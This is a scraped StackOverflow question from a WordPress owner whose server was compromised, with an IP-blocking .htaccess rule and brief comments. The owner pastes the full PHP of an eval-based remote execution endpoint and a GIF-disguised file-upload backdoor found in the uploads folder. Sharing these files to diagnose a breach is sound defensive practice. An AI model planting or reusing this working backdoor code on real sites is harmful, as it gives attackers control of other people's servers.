Databases
StackOverflow2013
Postsdbo
POMy wordpress has been hacked, but what did the hacker do and how can I prevent it/ fix damage done
 

Note that there are some explanatory texts on larger screens.

plurals
  1. POMy wordpress has been hacked, but what did the hacker do and how can I prevent it/ fix damage done
    primarykey
    data
    text
    <p>I saw highload on my server and looked at the apache server-status and saw a post to /2c1067813c6d8d0f28e13f0ce2c024fcbc17267b.php that was eating up 12% of my cpu. I shutdown apache, moved the file, blocked the guy in my htaccess, and now I'm wondering what damage was done. looks like the file was added 4 days ago</p> <pre><code>&lt;?php define('PAS_RES', 'twentycharacterhash'); define('PAS_REQ', 'anothertwentycharacterhash'); define('RSA_LEN', '256'); define('RSA_PUB', '65537'); define('RSA_MOD', '104794000726189251970535248702278838322004964525979459116994208185097637663513'); define('DEFLATE_RESPONSE_DATA', True); header('Content-type: application/json'); error_reporting(0); $version=2;$requestId='0';$jsonRPCVer='2.0'; if(!function_exists('property_exists')) { function property_exists($class, $property) { if(is_object($class))$vars=get_object_vars($class); else $vars=get_class_vars($class); return array_key_exists($property, $vars); } } function senzorErrorHandler($errno, $errstr, $errfile, $errline) { switch ($errno) { case E_NOTICE: case E_USER_NOTICE: case E_WARNING: case E_USER_WARNING: return True; case E_ERROR: $code = 0; break; case E_USER_ERROR: $code = 1; break; default: $code = 2; } if(function_exists('json_encode')) { $message = "{$errstr} ({$errfile} Line: {$errline})"; $response = json_encode(array('jsonrpc' =&gt; $GLOBALS['jsonRPCVer'],'id'=&gt;$GLOBALS['requestId'],'error'=&gt;array('code'=&gt;$code,'message'=&gt; $message))); } else { $message = "{$errstr}"; $response = "{\"jsonrpc\":{$GLOBALS['jsonRPCVer']},\"id\":{$GLOBALS['requestId']},\"error\":{\"code\":{$code},\"message\":\"{$message}\"}}"; } die($response); } set_error_handler("senzorErrorHandler"); if(!function_exists('json_encode')) { if (!file_exists("compat/json.php")) trigger_error("#COMPAT-JSON#", E_USER_ERROR); require_once("compat/json.php"); function json_encode($data) { $json = new Services_JSON(); return($json-&gt;encode($data)); } } if(!function_exists('json_decode')) { if(!file_exists("compat/json.php")) trigger_error("#COMPAT-JSON#", E_USER_ERROR); function json_decode($data) { $json = new Services_JSON(); return($json-&gt;decode($data)); } } if(function_exists('bcmod')) define('BCMOD', true); else { if(!file_exists("compat/array_fill.php")||!file_exists("compat/bcpowmod.php")||!file_exists("compat/biginteger.php")) trigger_error("#COMPAT-BI#", E_USER_ERROR); require_once("compat/array_fill.php"); require_once("compat/bcpowmod.php"); require_once("compat/biginteger.php"); } function rsa_encrypt($message, $public_key, $modulus, $keylength, $notSigning = true) { $result = ''; $chunkLength = intval($keylength / 8) - 11; for($i = 0; $i &lt; strlen($message); $i=$i+$chunkLength) { $padded = add_PKCS1_padding(substr($message, $i, $chunkLength), $notSigning, intval($keylength/8)); $number = binary_to_number($padded); $encrypted = pow_mod($number, $public_key, $modulus); $binary = number_to_binary($encrypted, intval($keylength/8)); $result .= $binary; } return $result; } function rsa_decrypt($message, $private_key, $modulus, $keylength) { $result = ''; $chunkLength = intval($keylength/8); for($i = 0; $i &lt; strlen($message); $i=$i+$chunkLength) { $number = binary_to_number(substr($message, $i, $chunkLength)); $decrypted = pow_mod($number, $private_key, $modulus); $presult = number_to_binary($decrypted, $chunkLength); $pres = remove_PKCS1_padding($presult, $chunkLength); if ($pres === FALSE) return FALSE; $result .= $pres; } return $result; } function rsa_sign($message, $private_key, $modulus, $keylength) { return rsa_encrypt($message, $private_key, $modulus, $keylength, false); } function rsa_verify($message, $signature, $public_key, $modulus, $keylength) { $result = false; $result = ($message==rsa_decrypt($signature, $public_key, $modulus, $keylength)); return $result; } function pow_mod($p, $q, $r) { if(defined('BCMOD')) { $factors = array(); $div = $q; $power_of_two = 0; while(bccomp($div, "0") == 1) //BCCOMP_LARGER { $rem = bcmod($div, 2); $div = bcdiv($div, 2); if($rem) array_push($factors, $power_of_two); $power_of_two++; } $partial_results = array(); $part_res = $p; $idx = 0; foreach($factors as $factor) { while($idx &lt; $factor) { $part_res = bcpow($part_res, "2"); $part_res = bcmod($part_res, $r); $idx++; } array_push($partial_results, $part_res); } $result = "1"; foreach($partial_results as $part_res) { $result = bcmul($result, $part_res); $result = bcmod($result, $r); } return $result; } //Math_BigInteger implementation $p = new Math_BigInteger($p); $q = new Math_BigInteger($q); $r = new Math_BigInteger($r); $x = $p-&gt;modPow($q, $r); return $x-&gt;toString(); } function add_PKCS1_padding($data, $isPublicKey, $blocksize) { $pad_length = $blocksize - 3 - strlen($data); if($isPublicKey) { $block_type = "\x02"; $padding = ""; for($i = 0; $i &lt; $pad_length; $i++) $padding .= chr(mt_rand(1, 255)); } else { $block_type = "\x01"; $padding = str_repeat("\xFF", $pad_length); } return "\x00" . $block_type . $padding . "\x00" . $data; } function remove_PKCS1_padding($data, $blocksize) { #bad data length if(strlen($data) != $blocksize) return FALSE; if(($data[0]!="\0") || ( ($data[1] != "\x01") &amp;&amp; ($data[1] != "\x02") )) return FALSE; #bad padding type $offset = strpos($data, "\0", 1); return substr($data, $offset + 1); } function binary_to_number($data) { if(defined('BCMOD')) { $base = "256"; $radix = "1"; $result = "0"; for($i = strlen($data) - 1; $i &gt;= 0; $i--) { $digit = ord($data{$i}); $part_res = bcmul($digit, $radix); $result = bcadd($result, $part_res); $radix = bcmul($radix, $base); } return $result; } //Math_BigInteger implementation $result = new Math_BigInteger(); $p = new Math_BigInteger("0x100", 16); $m = new Math_BigInteger("0x01", 16); for($i=strlen($data)-1; $i&gt;=0; $i--) { if(defined('MATH_BIGINTEGER_MODE') &amp;&amp; defined('MATH_BIGINTEGER_MODE_INTERNAL') &amp;&amp; (MATH_BIGINTEGER_MODE == MATH_BIGINTEGER_MODE_INTERNAL)) { $d = new Math_BigInteger(); $d-&gt;value = array(ord($data[$i])); } else $d = new Math_BigInteger(ord($data[$i])); $d = $d-&gt;multiply($m); $m = $m-&gt;multiply($p); $result = $result-&gt;add($d); } return $result-&gt;toString(); } function hex_to_binary($hex, $blocksize) { $result = ''; for($i = 0; $i &lt; (strlen($hex) - 1); $i = $i + 2) $result = $result . pack('H2', substr($hex, $i, 2)); $result = pack('H'.sprintf('%d',strlen($hex)), $hex); return str_pad($result, $blocksize, "\x00", STR_PAD_LEFT); } function number_to_binary($number, $blocksize) { if(defined('BCMOD')) { $base = "256"; $num = $number; $result = ""; while($num &gt; 0) { $mod = bcmod($num, $base); $num = bcdiv($num, $base); $result = chr($mod) . $result; } return str_pad($result, $blocksize, "\x00", STR_PAD_LEFT); } //Math_BigInteger implementation $result = ""; $num = new Math_BigInteger($number); $zero = new Math_BigInteger(); $divider = new Math_BigInteger("0x100",16); while($num-&gt;compare($zero) &gt; 0) { list($num, $remainder) = $num-&gt;divide($divider); $add = $remainder-&gt;toBytes(); if($add == '') $add = "\0"; $result = $add . $result; } return str_pad($result, $blocksize, "\x00", STR_PAD_LEFT); } function rsa_sign_b64($message, $private_key, $modulus, $keylength) { return base64_encode(rsa_sign($message, $private_key, $modulus, $keylength)); } function rsa_verify_b64($message, $signature, $public_key, $modulus, $keylength) { return rsa_verify($message, base64_decode($signature), $public_key, $modulus, $keylength); } function rsa_encrypt_b64($message, $public_key, $modulus, $keylength) { return base64_encode(rsa_encrypt($message, $public_key, $modulus, $keylength)); } function rsa_decrypt_b64($message, $private_key, $modulus, $keylength) { return rsa_decrypt(base64_decode($message), $private_key, $modulus, $keylength); } function get_rnd_iv($iv_len) { $iv = ''; while ($iv_len-- &gt; 0) $iv .= chr(mt_rand(1, 255)); return $iv; } function md5_encrypt($plain_text, $password, $iv_len = 16) { $plain_text .= "\x13"; $n = strlen($plain_text); if ($n % 16) $plain_text .= str_repeat("\0", 16 - ($n % 16)); $i = 0; $enc_text = get_rnd_iv($iv_len); $iv = substr($password ^ $enc_text, 0, 512); while ($i &lt; $n) { $block = substr($plain_text, $i, 16) ^ pack('H*', md5($iv)); $enc_text .= $block; $iv = substr($block . $iv, 0, 512) ^ $password; $i += 16; } return base64_encode($enc_text); } function md5_decrypt($enc_text, $password, $iv_len = 16) { $enc_text = base64_decode($enc_text); $n = strlen($enc_text); $i = $iv_len; $plain_text = ''; $iv = substr($password ^ substr($enc_text, 0, $iv_len), 0, 512); while ($i &lt; $n) { $block = substr($enc_text, $i, 16); $plain_text .= $block ^ pack('H*', md5($iv)); $iv = substr($block . $iv, 0, 512) ^ $password; $i += 16; } return preg_replace('/\\x13\\x00*$/', '', $plain_text); } function handleRequest($request = '') { if((!is_string($request))||($request==''))trigger_error("#REQUEST-EMPTY#", E_USER_ERROR); $request = json_decode($request); if(!is_object($request))trigger_error("#REQUEST-JSON#", E_USER_ERROR); if( (!property_exists($request, 'jsonrpc')) || (!property_exists($request, 'id')) || (!property_exists($request, 'method')) || (!property_exists($request, 'params')))trigger_error("#REQUEST-JSRPC#", E_USER_ERROR); $GLOBALS['requestId']=$request-&gt;id; if(floatval($request-&gt;jsonrpc) != 2.0) trigger_error("#REQUEST-VERSION#", E_USER_ERROR); $GLOBALS['jsonRPCVer']=$request-&gt;jsonrpc; if(!property_exists($request, 'sign'))trigger_error("#REQUEST-SIG#", E_USER_ERROR); if(property_exists($request, 'enc'))$request-&gt;params = md5_decrypt($request-&gt;params, PAS_REQ); if(property_exists($request, 'def')) { if(!function_exists('gzuncompress')) trigger_error("#COMPAT-ZLIB#", E_USER_ERROR); $request-&gt;params = gzuncompress($request-&gt;params); } if(!rsa_verify_b64(sha1($request-&gt;params), $request-&gt;sign, RSA_PUB, RSA_MOD, RSA_LEN))trigger_error("#REQUEST-SIG#", E_USER_ERROR); if($request-&gt;method != "execute")trigger_error("#REQUEST-METHOD#", E_USER_ERROR); $result = NULL; $success = @eval('?&gt;'.$request-&gt;params); if($success === FALSE) trigger_error("#REQUEST-PROCESSING#", E_USER_ERROR); $result = json_encode($result); $response = array ('jsonrpc' =&gt; $GLOBALS['jsonRPCVer'], 'id' =&gt; $request-&gt;id); if(function_exists('gzcompress') &amp;&amp; DEFLATE_RESPONSE_DATA &amp;&amp; (strlen($result) &gt; 100)) { $response['def'] = true; $result = gzcompress($result, 6); } $result = md5_encrypt($result, PAS_RES); $response['enc'] = true; $response['result'] = $result; return json_encode($response); } if (($_SERVER['REQUEST_METHOD'] == 'POST')&amp;&amp;(!empty($_SERVER['CONTENT_TYPE']))&amp;&amp;(preg_match('/^application\/json/i', $_SERVER['CONTENT_TYPE']))) echo handleRequest(file_get_contents('php://input')); </code></pre> <p>I created a file in the server root</p> <p>410.php</p> <pre><code>&lt;?php header('HTTP/1.0 410 Gone'); ?&gt; </code></pre> <p>And in my .htaccess apache file I added</p> <pre><code>RewriteEngine On RewriteBase / RewriteCond %{REMOTE_ADDR} ^188.138.56.125 [OR] RewriteCond %{REMOTE_ADDR} ^188.138.56.125 RewriteRule ^.*$ 410.php [L] </code></pre> <p>I also noticed in my wp-content/uploads folder a somehash.php file with the contents</p> <pre><code>GIF89a^A^@^A^@&lt;80&gt;^@^@&lt;FF&gt;&lt;FF&gt;&lt;FF&gt;^@^@^@!&lt;F9&gt;^D^A^@^@^@^@,^@^@^@^@^A^@^A^@^@^B^BD^A^@;^@&lt;?php $f=preg_replace('/(.*wp-content).*/i','\1',di rname(__FILE__)).DIRECTORY_SEPARATOR.'uploads'.DIRECTORY_SEPARATOR.$_FILES['F']['name'];move_uploaded_file($_FILES['F']['tmp_name'],$f);ech o "14qhpo"; ?&gt;^@; </code></pre> <p>and a directory in it with 777 permissions containing my wordpress files, which I also deleted.</p> <p>I'm going to reinstall my wordpress with fresh data and plugins in a clean directory, but how can I prevent this again, or better monitor for it? And what did the hacker do and how can I prevent it/ fix damage done?</p> <p>I see someone else got the same hack here <a href="http://pastebin.com/k5HUythK" rel="nofollow">http://pastebin.com/k5HUythK</a></p> <p><strong>EDIT 11/23</strong></p> <p>Strangely, I think the first code I pasted might be a plugin I just installed websitedefender.com because now it's sending me emails that the 'agent is not responsive', <a href="http://wordpress.org/extend/plugins/wp-security-scan/" rel="nofollow">http://wordpress.org/extend/plugins/wp-security-scan/</a>, <a href="http://wordpress.org/extend/plugins/websitedefender-wordpress-security/" rel="nofollow">http://wordpress.org/extend/plugins/websitedefender-wordpress-security/</a> </p> <p>I would have thought they would annotate that file if it was legit</p>
    singulars
    1. PO
      singulars
      1. PTAnswer
    1. This table or related slice is empty.
    1. PTQuestion
    1. USCharles
    1. USBF4
    plurals
    1. PL
      singulars
      1. LTLinked
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. PO
      singulars
      1. PTAnswer
    2. PO
      singulars
      1. PTAnswer
    3. PO
      singulars
      1. PTAnswer
    1. VO
      singulars
      1. POMy wordpress has been hacked, but what did the hacker do and how can I prevent it/ fix damage done
      1. This table or related slice is empty.
      1. VTUpMod
    2. VO
      singulars
      1. POMy wordpress has been hacked, but what did the hacker do and how can I prevent it/ fix damage done
      1. This table or related slice is empty.
      1. VTUpMod
    3. VO
      singulars
      1. POMy wordpress has been hacked, but what did the hacker do and how can I prevent it/ fix damage done
      1. USTom O'Connor
      1. VTFavorite
    1. COSaw some useful config here http://stackoverflow.com/q/6799496/879854
      singulars
      1. POMy wordpress has been hacked, but what did the hacker do and how can I prevent it/ fix damage done
      1. USBF4
    2. COIs this good practice to share its IP? Another computer could get this IP in a few hours or it could be a zombie computer manipulated from a different location and this IP will get clean again in a few days/months.
      singulars
      1. POMy wordpress has been hacked, but what did the hacker do and how can I prevent it/ fix damage done
      1. USFelipeAls
    3. CO@Felipe I don't know, but it's the ip hitting me now
      singulars
      1. POMy wordpress has been hacked, but what did the hacker do and how can I prevent it/ fix damage done
      1. USBF4
 

Querying!

 
Guidance
A row detail

Detail views are divided into sections. All the information in the data section comes from columns in the selected row. The other sections display data from other, related rows.

Related data can be related in a to-one or a to-many fashion. Captions of data related in a to-many fashion link to a list view showing a filtered view of the table.

Try moving around until you find a non-empty to-many entry and click on the label to get to one. You can move back to the root by clicking on the database name in the header.

SQuiL has stopped working due to an internal error.

If you are curious you may find further information in the browser console, which is accessible through the devtools (F12).

Reload